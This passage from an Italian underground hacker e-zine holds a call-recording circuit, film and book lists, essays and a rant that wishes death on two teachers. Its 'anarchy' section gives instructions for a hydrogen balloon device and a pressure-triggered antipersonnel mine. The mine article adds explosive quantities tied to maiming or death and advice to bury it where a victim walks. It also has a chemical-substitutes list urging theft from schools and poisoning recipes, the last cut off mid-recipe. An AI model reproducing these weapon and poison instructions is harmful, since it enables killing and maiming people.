sempre su Rec. Se non riuscite a trovare un registratore che abbia questa
presa potete prenderne uno qualsiasi, smontarlo e interrompere il cavetto
positivo (rosso) che esce dal vano delle batterie ed arriva alla scheda
del registratore. Collegate alle estremità del cavetto tagliato due
spezzoni di filo che collegherete poi ai poli del relè. Così la corrente
delle batterie passerà al registratore solo a cornetta alzata.

Elenco Componenti

R1=100k
R2=10k
R3=47k
R4=100k
R5=22k
C1=47kpF poliestere 250V
D1=1N4148
D2=1N4148
D3=1N4007
D4=1N4007
DZ1=zener 18volt 1W
VR=varistore 120V
TR1=BF391
TR2=BF391
RELE=Reed da 5V

[ Wawer's heavy industries ]



.-------------------------------------------------------[ CulTuRe/Film ]-----.
| FILM DA VEDERE |
*----------------------------------------[ ]CyB0rG[ ]--[cyborg@freemail.it]--*

Tempo fa su Newbies venne publicata una lista di films interessanti...
anche io avrei dei films da consigliarvi ma riscrivere quelli dell'altra
zine, seppure degni di nota, mi pare assurdo e poco professionale quindi
vi rimando all'articolo di N0bodY88 apparso sul no.3 di Newbies e oltre quelli
consiglio di vedere anche questi:

 Nemico Pubblico - Film mooolto interessante, seppure la storia iniziale e'
abbastanza semplice, vengono mostrate delle tecniche di intercettazione
attuali, etc... il tutto ad opera della NSA.

 The Matrix - Stupendo, sia per gli effetti speciali che per la trama,
anche se molti che conosco per capirlo hanno dovuto vederlo almeno 2 volte
(saranno un po' ritardati??). Ve lo rovinerei scrivendone la trama:
vedetelo!

 Existens - Mai visto un film cosi' strano... nemmeno Pulp Fiction ha le
scene cosi' incasinate tra loro! Comunque il genere e' quello di Nirvana:
si parla di un videogioco in realta' virtuale... vi stupirete alla fine.

 The Cube - Anche qui c'e' da impazzire: degli individui si risvegliano
all'interno di un gigantesco cubo pieno di trappole e stanze e dovranno
tentare di uscirne vivi

 La stanza del 13° piano - Anche questo abbastanza incasinato, il genere e'
sempre fantascienza e, nemmeno a dirlo parla di un videogioco (tutti i
registi ce l'hanno coi videogiochi e la realta' virtuale o mi sbaglio?)
... anche questo film da vedere molto attentamente per non rischiare di
non capirci una sega.

 The Truman Show - Un individuo posto a sua insaputa da sempre al centro di
uno spettacolo televisivo che manda in real time, tramite le telecamere
poste ovunque la sua vita privata...

 Codice Mercury - La NSA mette a punto un nuovo sistema crittografico dal
nome 'Mercury' che viene definito inviolabile (chi se ne intende di
crittografia sapra' che il termine l'inviolabilita' non esiste ed e' solo
questione di tempo) e, un bambino dotato riesce a leggere in chiaro i
messaggi crittografati col Mercury...

bye

]CyB0rG[


.------------------------------------------------------[ cuLtUrE/bOOkS ]-----.
| COMPITI PER LE VACANZE... |
*----------------------------------------[ ]CyB0rG[ ]--[cyborg@freemail.it]--*

Credevate fosse finita? Dite la verita' pensavate fosse finita, pensavate:
estate = fare un cazzo. Beh mi spiace ma vi sbagliavate, almeno a mio parere
l'estate e' un momento in cui non si ha lo stress del lavoro o della scuola:
una stagione di relax... beh, ma poi in inverno che vi resta di questo relax
se non il ricordo o la voglia della prossima vacanza?

Sfruttiamo le vacanze in modo intelligente alternando alla figa e agli amici
anche un po' di studio 'alternativo', per imparare/approfondire argomenti che
ci resteranno per sempre e che sicuramente ci serviranno. In queste righe ho
selezionato dei libri che personalmente consiglio come al lettore medio di
questa zine come letture estive (e non solo): libri che varieranno dalla
sicurezza informatica, storia del movimento hacker, letteratura cyberpunk,
etc... ...buona lettura.

[tra le '@' troverete i miei commenti al libro (solamente per quelli che ho
letto)].

- Dizionario di informatica e multimedia - Tecniche Nuove - 45.000
@ Questo volume raccoglie tutti i termini informatici e li definisce @

- TCP/IP, guida completa - Apogeo - 69.000
@ La guida al protocollo di comunicazione sul quale si basano internet e
molte reti locali @

- Linux massima sicurezza - Apogeo - 78.000 (+CD)
@ Un libro che si pone come punto di riferimento per la sicurezza dei
sistemi basati su o.s. Linux @

- Crittografia invisibile - McGraw-Hill - 46.000
@ Questo libro parla di steganografia @

- Misure di sicurezza per la privacy in azienda - Buffetti - 50.000 (+CD)

- Tecniche di sicurezza internet - Jackson Libri - 59.000 (+CD)

- Firewall Internet - Jackson Libri - 75.000 (+CD)

- Kriptonite - Nautilus - 23.000
@ Questo penso non ci sia bisogno di comprarlo poiche' e' possibile trovarlo
on-line poiche' sottoposto a nessun copyright. Il libro parla di
crittografia, steganografia, remailer... ...l'indirizzo web e'
http://www.ecn.org/kriptonite @

- Hacker! Tecniche di protezione dei sistemi - Apogeo - 59.000
@ Sicuramente un ottimo libro riguardante la sicurezza informatica: si parla
di tecniche di attacco e di difesa, il tutto spiegato da 0 e per i o.s.
Windows Nt/9x/2000, Unix, Linux... @

- Hacker Proof - McGraw Hill - 76.000 (+CD)
@ Un altro libro degno di nota e' questo volume: si parla di firewall,
tcp/ip, crittografia, firma digitale, unix, windows NT, java, virus,
activex... @

- Guida ai virus dei computer - Jackson Libri - 45.000
@ Questo libro, un po' vecchiotto, analizza i vari tipi di virus, le tecniche
usate dai virus, gli antivirus, la storia dei virus... @

- Codici & Segreti - Rizzoli - 33.000
@ Libro di base (almeno nella prima parte) sulla crittografia @

- Segreti spie e codici cifrati - Apogeo - (+CD)
@ Questo libro analizza la crittografia dal lato storico, legale e tecnico @

- Open Source - Apogeo - 29.000

- Spaghetti hacker - Apogeo - 30.000
@ Impossibile non averlo! Questo libro racconta la storia del movimento
hacker in Italia, le tecniche utilizzate, l'aspetto giuridico... @

- Italian crackdown - Apogeo - 20.000
@ Questo libro parla delle varie maxi operazioni di arresti nei confronti
del cyber-underground @

- Computer crime - Apogeo - 39.000
@ Qui si analizza l'aspetto legale/informativo del computer crime:
l'apprendimento del crimine online, lo scambio di informazioni tra i
gruppi terroristici la pirateria del software, La pirateria aziendale... @

- Hackers - Shake - 33.000
@ In questo libro c'e' la storia del movimento hacker mondiale @

- Cyberpunk - Shake - 20.000
@ Qui i compagni della Shake hanno raccolto e tradotto del materiale
riguardante il movimento cyberpunk @

- Cyberterrorismo - Castelvecchi - 18.000
@ Qui si analiza il famoso rapimento virtuale effettuato dai mitici Etoy @

- No copyright, nuovi diritti nel 2000 - Shake - 22.000
@ Il titolo dice tutto :-) @

- Camminando sulla rete telematica con le forbici in mano - Nautilus - 5.000
@ Un libro uscito un po' di tempo fa dove si parla di cyberpunk @

- Bruce Sterling - Giro di vite contro gli hacker - Shake - 23.000
@ Il romanzo di Sterling sul famoso crackdown americano @

- Luther Blissett - Totò, Peppino e la guerra psichica 2.0 - Einaudi - 20.000
@ Raccolta di testi di guerriglia mediatica girati sotto il nome di Luther
Blissett @

- George Orwell - 1984 - Mondadori - 13.000
@ Ecco un libro che mi ha cambiato la vita. E' un romanzo scritto da Orwell
moolto tempo fa ma restano attuali i sui concetti di Grande Fratello @

Beh, non penso li compriate tutti perche', ahime', ci vuole parecchia money...
...comunque almeno qualcuno e' d'obbligo se volete entrare nell'ottica hacker
e imparare le tecniche fondamentali di attacco e difesa... il tutto ovviamente
nel caso non abbiate gia' queste conoscenze.

bye

]CyB0rG[


.-----------------------------------------------------------[ thInKinG ]-----.
| PUBBLICITA' SUBLIMINALE |
*-------------------------------[ GourangA ]--[gouranga_phreak@hotmail.com]--*


La pubblicita' subliminare e' un sistema usato da grandi aziende o simili per
farci un lavaggio del cervello ricorrendo alla pubblicita'(appunto).

Un frame che dura pochi decimi di secondo fra un fotogramma e l'altro,
invisibile a occhio nudo, tramite determinati colori e suoni, entra nel
subconscio e viene fissato dalla mente, la mente continua ad elaborare nel
subconscio quella determinata immagine, fino a risalire al messaggio.

Tramite questo semplice metodo, e' possibile influenzare persone e fargli
fare determinate azioni, spesso involontarie, che possono essere dannose.

La singola visione della pubblicita' non provoca danno, ma la ripetuta
visione, ad esempio se in un ora la pubblicita' viene ripetuta 50 volte,
l'influienza sara' grave (n.b. di zio`sP3nKy -> kualkosa di simile
al metodo "Ludovico" Arancia Meccanica).

L'azione che ora prendero' d'esempio e' l'acquisto di un prodotto differente
da quello della pubblicita' dovuto mediante pubblicita' subliminare:


Il soggetto mentre guarda la televisione e vede la pubblicita' di una
notissima marca d'auto.

Inconsciamente con la prima visione la pubblicita' viene fissata nella mente,
specialmente un microfotogramma di brevissima durata, la ripetuta visione
della pubblicita' fa inconsciamente fissare nella mente del soggetto
l'immagine, che viene elaborata.

Il soggetto dopo una certa frequenza di visione, viene costretto
involontariamente a comprare il determinato oggetto o fare l'azione che
l'immagine subliminare gli dice di fare.

Pensate se questo metodo fosse usato per scopi politici, o peggio, per avere
un esercito di "robot" pronti a fare ci0' che gli si comanda....

Il funzionamento e' semplice, la mente umana, per quanto complessa, puo'
semplicemente essere manipolata, un immagine con colori che la mente fissa
perennemente e in una determinata situazione, per un determinato
numero di secondi, con una certa frequenza, viene fissata, magari con il
rispettivo mesaggio che dice di fare determinata azione.

Esistono leggi che controllano questi metodi di propaganda
occulta/subliminare, ma non possono proteggerci al massimo, e se un potente
fa uso di questi metodi, cosa puo' fermarlo?

D'altronde noi tentiamo solo di sopravivvere ai potenti in un mondo
difficile...

[ GourangA© ]

.-----------------------------------------------------------[ thInKinG ]-----.
| CHI HA PAURA DELL'HACKER CATTIVO?? |
*----------------------------------------------[ Keper ]--[k.eper@jumpy.it]--*
Gli Hacker e i benpensanti

Mi ritrovo spesso a leggere articoli sugli hacker e lasciatemi dire che
incomincio ad avere paura ad accendere anche il cellulare. Si perché dalle
informazioni che girano, sembrerebbe che in mezzo a noi operino dei
personaggi veramente pericolosi, ragazzi brufolosi che hanno dimenticato
cos'è una gita in campagna, cosa significhi uscire con gli amici o innamorarsi
di una coetanea; dai resoconti giornalistici mi immagino orde di persone
dedite alla distruzione, che si riuniscono in stanze sporche e maleodoranti
come le loro ascelle, intenti a discutere su quale sito Internet attaccare o
a quale server appoggiarsi per la prossima azione.

Ragazzini stanchi della vita, che tra una canna e l'altra, non riescono ad
adeguarsi a quella che gli si presenta davanti e si rifugiano in una
dimensione virtuale che non tiene conto della loro età, ma solo delle loro
qualità.
I media ci vogliono far credere di trovarci di fronte a dei delinquenti
peggio di Rina o di Jack lo Squartatore: possiamo immaginarli mentre camminano
in mezzo alla gente, attenti a non parlare con nessuno e soprattutto a non
farsi toccare perché, se non lo sapevate, loro non sono come noi: pare abbiano
le squame e le lingue biforcute, si nutrano di insetti e, cosa ancora più
grave, non guardino mai la televisione.

Alle volte si sentono testimonianze di persone che dicono di averne visto uno
nella sua forma originale, senza maschere: brutto, puzzolente, squamoso.
Testimonianze di una terribile esperienza, profumatamente pagate, raccontate
ad un qualsiasi talk show trasmesso dalle nostre amate televisioni. Dovrei
rimanere a casa, ma anche qui non mi sento sicuro, ho paura ad accendere il
PC, chissà da quanto tempo uno di loro con le sue potentissime tecnologie mi
sta già spiando? Chissà se sono al sicuro? Chissà…?

Ho deciso! Per difendermi, diventerò come loro!
Sento già che la pelle si sta trasformando, sento le pupille diventare come
quelle di un gatto, mi sento già più sicuro. Una nuova coscienza mi pervade e
vedo tutto più chiaro, Finalmente mi accorgo che il vero pericolo non sono
quelli come me, che la mia diversità non è altro che il prodotto della mia
nuova condizione mentale, che il pericolo non è la mia sete di conoscenza, ma
i blocchi che vengono imposti a questa sete, che il pericolo si chiama
Carnivore, Echelon e soprattutto ignoranza.

I miei mezzi non sono legali, questo lo riconosco, ma la mia etica va oltre
alla legalità, perché è superiore ad essa. In fondo sono solo diverso perché
vedo in modo diverso e per questo vengo criminalizzato.
Continuate pure a demonizzarci, non siamo noi che non capiamo, siete voi che
non volete ascoltare.

Adesso vi lascio, ho fame ed è appena passato un bug da sfruttare al volo.

[ Keper ]



.-----------------------------------------------------------[ thInKinG ]-----.
| CYBLIFE: RAFFREDDATO I PRIMI DI SETTEMBRE |
*------------------------------------------------------------[ ? ]--[??@??]--*


Raffreddato i primi di settembre,
quand'ancora il sole riscalda e rinforza il sangue.

M'avvio al lavoro, incontro Mau, ragazzino che abita tra l'indecisione
dell'universita', mi dice "ciao andre'..come va?" (dolore e fastidio)
Riesco a distrarmi con naturalezza e rispondo 'chi?' (sono in trappola...
uscita troppo stupida) ' a si...bhe ... da sola' "ti regalo una maschera di
gelso... cosi' ti tiri su'...nel frattempo vieni a farti un baffo?"

Un baffo? ... alle 8.50 di mattina? come si puo' essere cosi' cattivi! sono
in ritardo, sto in depressione, sono intrattabile come la bile... e sto
stronzetto viene a dirmi con sta faccia beota di chi non fa un cazzo
"vieni a farti un baffo"... con 'sto torpore rattrappito e schizofrenico ...
a me lo vieni a dire! devo andare al lavoro e c'ho 20 minuti di ritardo
ordinario... un baffo ... a me .. adesso... con tutto che spinge, che si
agita, che mi incita....

'Certo'

Ci accompagnammo, intrattenendoci a vicenda, fino al locale che abbiamo in
affitto (io con altri 4-3, lui non c'entra un cazzo)
[inevitabile]
"... e con vale come va?"

e ti aspetti una risposta? sara' la 3a\4a volta che me lo chiedi...
*COGLIONE!!!* - penso di nascosto
*e da 4 mesi che ci siamo lasciati e da allora continui a farmi 'sta domanda*
'...complimenti'.Ma non e' colpa sua... delle volte gli argomenti si
esauriscono da soli, e si cerca di spaziare in luoghi comuni e di comune
interesse ... capita,...poi,c'e' che chi hai di fronte non te ne frega
niente... Pero e' brutto farlo pesare cosi' Kristaccio!

'...l'ho persa di vista... avrei voluto perderla' *si come no! magari come
gli scontrini d'accredito dei miei fottuti Restaurant Ticket.*
abbozzo un pongosorriso ... ma cosi' finto che lo uccido subito.(il sorriso,
lui costerebbe troppo) 'sai com'e'' *e che non celo sa'?*

"ha si gia!... e' vero ... ricordo .. capisco" #il solito sfigatello
incazzato# pensa con sguardo che tende all'infinito dell'oblio ... Stai male
e ti picchiano sopra ... stai bene sei allegro, ti girano attorno per
succhiarti il buonumore gli mollo una scorza e mi guarda smarrito e mi chiede
con aria da agnello pronto al macello
"Perche'?"
'Non pensare cosi' forte e cosi' male'
mi guarda con lo sguardo fintostupito, sapete no... quello che usate quando i
vigili vi chiedono,poco prima di farvi la multa, che andavate contro il senso
di marcia. (a volte si e' macellati a volte macellai. Citaz.)[provate a
spiegargli che per 5 metri avresti dovuto fare il giro della citta' e vedrete
quant'e' comprensivo].

So di non aver ragione... ma questo succedera' dopo.
chissa se ha capito perche'.... mi rifugio in un bar per quietare la
situazione armato del pretesto di trovare un invito da discoteca per fare il
lungo filtro necessario alla circostanza.
Trovato...titolo della simpatica serata... Notte Bagnata ...*Tanto cara mi fu
quest'erema indifferenza* che mi permise allora di prendere quella riduzione
senza sforzo.

tic tac... il tempo scorre... sangue interdetto e smarrito pulsa ... discesa
come salita ... corri piccolo uomo... soddisfazione e' quello che conta...
annega il fastiDio ... tic tac ..non essere imbronciato. .. calmati...
Esatto ... calmati... giro di chiave, colpo secco e deciso ... 4 passi poche
parole di circostanza,... smazza il tabacco ... mesci il marocco caldo ...
unisci le papier... attacca i due fogliettini all'estremita .. riempi i due
palloncinifreccia con gli umori freddi ... brucia lo steppaio ... concentrati
sui buchi -..gonfia l'aria con la benedizione dionica del dio narcos ...

Panteo dice: "dovresti gia' essere nel tuo posto responsabile";.. come gia'
hanno detto per me delle volte si e' macellai a volte macellati .....
<che sia giusto o no>
Goditi questo grande momento piccolo uomo .... che fuori fa freddo e non c'e'
tempo per riscaldarsi.



.-----------------------------------------------------------[ thInKinG ]-----.
| I PENSIERI STRANI DI UNO QUALUNQUE |
*-------------------------------------------------------[ Tonino ]--[??@??]--*

Sapete che palle essere sfruttati dalle grosse multinazionali alleate
con i nostri politici cioe coloro che dovrebbero rappresentarci in
parlamento e nei rapporti internazionali
e che invece prendono soldi proprio dalle grosse industrie vedi la
sinistra che dovrebbe essere a favore dei diritti del popolo garantire
sicurezza
alle classi meno privilegiate con il suo slogan come mai come mai sempre
in culo agli operai fa leggi che favoriscono la grossa industria;un
esempio?I corsi di formazione pagati dalla regione dei quali possono
usufruire solo aziende con un certo capitale
e con un certo numero di dipendenti,allora,loro cosa fanno? Mo ve lo
dico, assumono il dipendente lo fanno lavorare come uno stracazzo di
asino gli rubano con la prepotenza quelle 200.000 lire dalla busta paga
e lo sfortunato continua darsi da fare con il lavoro con la speranza di
essere assunto definitivamente,ma col cazzo che questo viene assunto
a fine mandato lo speranzoso non ha imparato niente o meglio meno di
niente perche' spesso ha dovuto fare lavori che non centravano niente
per quelli per cui era stato assunto, l'industriale licenzia tutti e ne
prende degli altri con gli stessi finanziamenti,cosi' il grosso
industriale ha manodopera gratis anzi che lo paga visto che ad ognuno
frega quelle 200.000 lire e vende la sua merce ai prezzi che aveva
prima,bellissimo, e chi vuole un finanziamento per aprire una piccola
attivita' deve scoppiare per tentare di averlo, e nella maggior parte
dei casi difficilissimo averlo e cosi' tutti i sinistroidi convinti sono
contro il commerciante il piccolo imprenditore che tenta di sopravvivere
perche' e' lui la persona piu' ricca che possono vedere nei loro ambienti e
quindi l'unico di poco superiore economicamente a loro (tranne per me che ho
un'attivita e sono piu' povero di uno stipendiato, pero' ce ne sono altri
nella mia situazione) poi non puo' permettersi di pagare ne la sinistra e ne
ladestra alleata alla grossa borghesia vedi Apgnolli parlamentare di
sinistra che durante la II guerra mondiale voleva il prolungarsi della
stessa per vendere di piu' e ora parlamentare di sinistra (qui ci
aggiungerei un gigno con annessa super incazzatura) e questo non ha
creato tanto rancore nella gente come quando =E8 entrato in politica
berlusconi altro grosso capitalista

solo che serlusconi ha preso la nominata del coglione e gli altri
ricconi di sinistra che girano con i Mercedes o grosse Alfaromeo super
lussuose no, cazzo berlusconi va a farsi i cazzi suoi e gli altri no,
secondo la stragrande maggioranza dell'opinione pubblica ignorante
cogliona e prsuntuosa. Questo non vuol dire che sono a favore di
serlusconi che =E8 sicuro come la morte che si va a fare i cazzi suoi,
come tutti i ricconi del cazzo, o i grossi politici politici che hanno
in mano magistrati e professori, non sono neanche a favore della destra
anzi non me ne importa niente anche perche' la destra oserei dire,
anche lei a favore dei grossi capitalisti, a favore di chi ha gia un
nome e quindi lascia penalizzato chi tenta di emergere, percio' fateci
caso le leggi che i nostri governi di destra e sinistra fanno sono a
favore di chi li paga contro i pecoroni che li vanno a votare quindi
secondo me votate solo chi vi da garanzie altrimenti non andate a votare
come faccio io. Siamo usati ancora dalla televisione che ci ha
cresciuti con l'idea che un giorno saremmo diventati belli, ricchi, che
il superfluo ciserva veramente; ci serve veramente una casa al mare o un
piumone o deve essere per forza un problema per un uomo di sessant'anni
non riuscire ad avere le stesse erezioni di quando ce ne aveva qundici e
si deve quindi dopare con il viagra e rompere i coglioni alla moglie che
ha la stessa attivita sessuale de marito non inviagrato?
A volte la grande massa cogliona =E8 talmente convinta che la marca e
qundi la confezione centri con la qualita' del prodotto che solo chi ha
un nome dietro le spalle si a di qualita' o almeno si l'unico a dareuna
certa garanzia, pensate per esempio alla sGOODYwear la fabbrica che
costruisce gomme, be stava per chiudere in Italia e si alzo' un
polverone tutti ne parlavano televione giornali interviste ai politici
che dicevano ''non faremo chiudere''; dopo unpo' tutto tace la
sGoodYwear chiude un sacco di operai e non, sono disoccupati, mentre
tutti gli affezionati coglioni di questa marca di gomme che continuano
ancora imperterriti a comprarla non pensando alle centinaia di famiglie
rimaste senza stipendio, questo non sarebbe successo in Francia per
esempio dove il popolo ha una sua coscenza nazionale e non avrebbe piu
comprato gomme sGoodYwear se avesse chiuso in Francia. Ora i macchinari
dello stabilimento italiano sono in Polonia perche' la grossa
multinazionale ora si deve aprire un mercato nei paesi dell'est per loro
noi siamo solo mercato,percio' perche lavorare di piu' per comprare
qualcosa che ha un nome e quindi costa di piu'?ci serve veramente averla
ci serve veramente per esempio usare l'automobile inquinare e buttare
soldi per la benzina che continua sempre ad aumentare, solo per farci un
giro,per andare a trovare i parenti o gli amici? i produttori di
petrolio aumentano i prezzi e tutti i coglioni pecroni il giorno dopo a
mettersi la benzina alle auto con il solo pensiero :<<E noi che possiamo
farci?>> be! si potrebbe iniziare a non usare + la benzina o il diesel
protestando tutti in massa consumare meno elettricita' per esempio se
una grossa parte di noi non comprasse + il carburante per un largo
periodo di tempo allora questo farebbe abbassare prezzo e i produttori
di petrolio accuserebbero una bella batosta, e allora si che nonci
faremmo mettere i piedi in testa dai grossi capitalisti.Secondo me
dovrebbero circolare macchine da lavoro mezzi pubblici per il trasporto
delle persone e non dite che non funzionano perche' se tutti pagaste il
biglietto e circolassero solo i mezzi da lavoro allora si che tutto
funzionerebbe,opure per chi ha intenzione di camminare come faccio io
puo' andarsene in giro a piedi.Ultimo consiglio montatevi sulla vostra
auto un impianto a gas avrete meno spese tranne quella dell'acquisto e
l'istallazione e inquinerete molto meno
ciao

PENSATE CON LA VOSTRA TESTA
FOTTETE POLITICI E POTERE
SIATE ANARCHICI E SBALLATEVI SE VI VA...................


IL PROFESSOR SPERCIUCCI CHE HA SUBITO UN TRPIANTO DI CAPELLI PERCHE' LI
STAVA PERDENDO (LUI E' UN PANZONE DI MERDA), E LA PROFESSORESSA
GRAFEGNA(E' MAGRA E BRUTTA COME PUZZETTA PERO' HA GLI OCCHI AZZURRI)
SONO DEI COGLIONI BASTARDI,PENSATE CHE MI AVEVANO PRESO SUL CAZZO UN
ANNO PRIMA, QUANDO MI HANNO BOCCIATO,E L'ANNO DOPO MI HANNO UMILIATO
SENZA MOTIVO, E HANNO TENTATO DI TOGLIERMI LA VOLONTA' DI STUDIARE E
QUINDI DI IMPARARE NON PENSANDOMI QUANDO ERO IN DIFFICOLTA' E CHIDEVO
CHIARIMENTI E MI HANNO ESCLUSO DAI VARI GRUPPI DI LAVORO SPERO CHE
MUOIANO......ME NE STAVO SCORDANDO I BASTARDONI FACEVANO GROSSA
PROPAGANDA POLITICA NELLA SCUOLA A FAVORE DI ALCUNI PARTITI PERCHE'
SICURAMENTE LORO SONO STATI INSERI DENTRO LA SCUOLA GRAZIE ALLE
ORGANIZZAZIONI POLITICHE A CUI FANNO PARTE E HANNO PRESO SICURO LA
LAUREA ANCHE GRAZIE A LORO,GUARDATELI ALL'OPERA MENTRE INSEGNANO FANNO
VERAMENTE CACARE E COME HO DETTOGIA' PRIMA SONO I GROSSI POLITICI CON LE
LORO ORGANIZZAZIONI CHE HANNO IN MANO LA NOSTRA SOCETA' CHE DIVENTA
SEMPRE PIU' MERDOSA

I nomi che ho citato su questo testo sono puramente inventati quindi non
tentate di denunciarmi

[ Tonino ]



.------------------------------------------------------------[ aNarcHy ]-----.
| BOMBA ALL'IDROGENO |
*---------------------------------[ m4l3f1k0 ]--[overlookhotel@disinfo.net]--*


Ingredienti:

* Una bottiglia da 2 litri
* Acido Idrocloridrico (HCl)
* Un foglio di alluminio
* pallone
* lungo stoppino

Procedura:

* riempi la bottiglia da 2 litri kon 20 o più strisce del foglio
d'alluminio arrotolate grossolanamente lunghe 31cm X 3cm
* Aggiungi cirka 230 gr HCL nella bottiglia
* Skuoti e rimuovi il tappo (assicurati di kiudere bene prima di skuotere)
* Posiziona il palloncino sopra la bottiglia per prendere l'Idrogeno (H)
ke uscirà dalla bottiglia
* Kuando il palloncino si è gonfiato, mettici dentro parzialmente lo
stoppino, e lega il palloncino kon un nodo.

-Nota: L'Idrogeno è più leggero dell'aria, kuindi se lasci il palloncino,
volera' via.

(potrebbe essere utile...)

[ m4l3f1k0 ]

.------------------------------------------------------------[ aNarcHy ]-----.
| MINA ANTIUOMO |
*-------------------------------[ GourangA ]--[gouranga_phreak@hotmail.com]--*

Occorrente:

- Una scatola.
- Polvere nera, o qualsiasi altro esplosivo che esploda per contatto
elettrico (es. nitro)
- Cavo elettrico.
- Batteria 9 v.
- Scatola ferro piu' piccola della precedente di ferro (opzionale).
- Molla(opzionale).

Scatola di legno:




________ _°°
| |@________/ \°°
| | °°
|_______|# [] °° <-------------coperchio scatola
| [] °°
| [] °°
| [] °°
| ___ ||
| °°°°\°°°°°°°°°°
| °°°°°\_°_°°°°°°
| °°°°°° |-/ |°°° <--------------lampadina
| °°°°°°°|-\_|°°°
cavo ----->| °°°°°°°°\°°°°°°
|______________\




Non so se capite !!!La molla tiene alto il coperchio della scatola, quando la
vittima appoggia il piede facendo pressione, abbassa la molla (anche se pu0'
essere benissimo sostenuto da qualsiasi altra cosa), il coperchio ha sul
fondo un cavo elettrico che si collega alla batteria, e sull'estremita'della
scatola, dove il coperchio abbassandosi tocca, c'e' un altro cavetto che si
collega alla lampadina, collegandosi, nel momento che la vittima abbassa il
piede, fa contatto e innesca l'esplosivo.

WOW!!! La nostra prima mina antiuomo e' esplosa......
La gamba del tizio e' da amputare, le ossa implodono, e lui probabilmente
rimarra' sordo e, nei peggiori casi, anche cieco.

CHE FIGATA.

Se volete fare le cose per bene, mettete l'esplosivo dentro una scatola
metallica, in modo da aumentare l'impatto, l'urto, le potenza e la sicurezza.
ora vi metto le quantita' testate, (ehm...):

50 grammi polvere nera = Danno non permanente alla gamba.
150 grammi polvere nera = Danno permanente o non (dipende dalla situazione)
350 grammi polvere nera = Amputazione della gamba.
1000 grammi polvere nera = Morte, o lesioni inreversibili su tutto il corpo.
500 grammi fulminato di mercurio = Non occore scriva il commento.

Ecco uno piccolo schema che ho trovato sulla rete per la potenza esplosiva
(per 100 g, non tenendo conto del volume).

Se si pensa che la gelatina esplosiva uguagli 100:

Gelatina esplosiva, 100
T4, 90
Pentrite, 80
Tritolo, 50
Fulminato di mercurio, 20
Polvere nera, 7

Credo vi siati fatti l'idea su quali usare, su come usarli e su chi usarli.

Generalmente in campo militare, e per opere di demolizione, si preferisce
calcolare il coefficiente di equivalenza rispetto al tritolo,
posto eguale ad 1.
Si avrà in questo caso:

Tritolo, acido picrico, miscele a base di dinamite, gun-cotton, 1
Gelatina esplosiva, 0,7
C2 e C3, T4, pentrite, 0,8
Tetrytol, tritolite, pentrolite, 0,9
Nitroammido, dinamite, 1,2
Esplosivi al nitrato d'ammonio, 1,4
Polvere nera da mina, 2,3

ORA UN POCO DI STORIA


La mina antiuomo da me descritta, e' stata usata dai vietnamiti durante la
guerra del Vietnam, il metodo e' stato preso dagli americani, che la hanno
usata su conflitti minori.
La differenza da me apportata e' semplicissima:

Loro usavano esplosivi del tipo TNT a iniezione di una valvola di apertura,
invece io ho apportato questo innesco perche' piu' semplice ed efficace.
I sopravvissuti a queste "rudimentali" mine antiuomo, oltre all'amputazione
della gamba, hanno un altissimo livello di sordita', lesioni permanenti su
tutto il corpo, e ustioni sulla parte inferiore del corpo, l'onda d'urto e'
piuttosto alta, le ossa tendono ad implodere e poi esplodere verso l'esterno
e verso l'alto.

COMMENTI
Consiglio di riempire il tutto con nitroglicerina, fulminato di mercurio, o
meglio ancora polvere nera.
Se la persona possiede un prato, voi potete sotterrare l'ordigno in modo che
lo calpesti.
Non bisogna ASSOLUTAMENTE fare i bastardi e piazzare l'ordigno in spiaggia o
in luoghi pubblici.
Pensate, succede a voi di pestare una mina antiuomo, come vi sentite dopo,
magari la calpesta un bambino (o un vucumpra' eheheheh).
Non pensate neanche di piazzarla senza seppellirla, non trovate la persona
tanto deficiente da passarci sopra col piede, che dice :

Oh, un tacchino, aspetta che lo schiaccio.

GourangA ®.


Dedicato a :
Beavis and Butt-head (hanno interotto la serie perche' antieducativi)
Tutti quelli su #phreak.it

[ GourangA ]



.------------------------------------------------------------[ aNarChY ]-----.
| LISTA DELLE SOSTANZE (TRADUZIONE) |
*---------------------------------[ m4l3f1k0 ]--[overlookhotel@disinfo.net]--*


E' giunto alla mia attenzione ke moltedi kuesti prodotti kimici vengono
venduti sotto nomi diversi, o ke potete avere equivalenti casalinghi.
Forse kuesta lista potrebbe aiutarti:

Acido acetico Aceto
Ossido di Alluminio Allumina
Alluminio di Potassio Solfato di Alluminio
Solfato di Ammonio Allume
Idrossido di Ammonio Ammoniaca
Carbonato di Calcio Gesso
Iperclorito di Calcio Polvere Sbiancante
Ossido di Calcio Calce
Solfato di Calcio Intonaco di Parigi
Acido Carbonico Seltz
Tetraclorato di Calcio Likuido per pulire
Diclorato di Etilene Dutch fluid
Ossido Ferrico Ruggine
Glucosio Sciroppo di amido
Grafite Punta di una matita
Acido Idrocloridrico Acido Muriatiko
Perossido di Azoto Perossido
Acetato di Piombo Zucchero di Piombo
Tetraossido di Piombo Piombo Rosso
Silicato di magnesio Talco
Solfato di magnesio Epsom salts
Naftaline Palline di Naftalina
Fenolo Acido Fenico
Bicarbonato di Potassio Cremore di Tartaro
Nitrato di Potassio Salnitro
Diossido di Sodio Sabbia
Bicarbonato di Sodio Baking soda
Borato di Sodio Borace
Carbonato di Soda Washing soda
Cloruro di Sodio Sale
Idrossido di Sodio Liscivia
Silicato di Sodio water glass
Solfato di Sodio Sali di Glauber
Trisolfato di Sdio Iposolfito di Sodio (Fotografo)
Acido Solforico Acido della Batteria
Saccarosio Zucchero di Canna
Clorito di Zinco Stagno fuso

Tieni questa lista sempre a portata di mano.

Se non puoi trovare uno o più ingredienti provane altri
Se proprio non puoi, puoi sempre prenderne un po da skuola, o da varie
kompagnie kimike. Kuando lo fai, fai in modo ke sia il più pikkolo possibile.

[ m4l3f1k0 ] (traduzione)

.------------------------------------------------------------[ aNarChY ]-----.
| COME FAR FUORI IL TUO ODIATO VICINO (TRADUZIONE) |
*---------------------------------[ m4l3f1k0 ]--[overlookhotel@disinfo.net]--*

Prefazione
-------
Se prendi le nozioni contenute in kuesto articolo abbastanza
seriamente per farlo, per favore ricorda dove l'hai letto.

(Nota di OldirOn61: no, non lo fare, almenoche' non hai deciso di passare
tutto il resto della tua vita "ar gabbio")

Veleni:

Diffenbachia (dumbcane)
=-=-=-=-=-=-=-=-=-=-=-=
Prendi 2-4 foglie e bolliscile nell'acqua (non inalare il fumo)
Quando l'acqua diventa di color verdognolo, prendi le foglie e mettile via.
Ora prendi il liquido e versalo nelle bevande nel cibo, ecc. del nemico,
La vittima perderà la voce.

Oleandro.
=-=-=-=-=
Prendi un ramoscello di kuesto e macinalo fino ad ottenere una polvere fine..

